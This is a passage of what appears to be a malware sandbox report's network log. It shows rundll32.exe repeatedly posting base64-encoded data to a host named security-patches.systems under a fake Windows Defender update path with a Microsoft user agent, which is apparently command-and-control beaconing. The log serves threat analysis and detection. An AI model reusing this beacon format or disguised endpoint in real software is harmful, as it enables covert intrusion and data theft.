                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:38.320646048 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:37 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            37192.168.2.549811185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:38.586344957 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:40.049025059 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:39 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            38192.168.2.549812185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:40.303375959 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:41.752965927 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:41 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            39192.168.2.549813185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:42.010320902 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:43.454627037 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:43 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            40192.168.2.549814185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:43.713587999 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:45.175491095 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:44 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            41192.168.2.549815185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:45.505367994 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:47.275989056 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:46 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            42192.168.2.549816185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:47.545623064 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:49.003232956 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:48 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            43192.168.2.549817185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:49.257334948 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:50.724167109 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:50 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            44192.168.2.549818185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:50.991919041 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:52.439371109 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:52 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            45192.168.2.549819185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:52.711251974 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:54.170114994 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:53 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            46192.168.2.549820185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:54.426835060 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:55.877197027 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:55 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            47192.168.2.549821185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:56.129458904 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:57.580692053 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:57 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            48192.168.2.549822185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:57.835892916 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
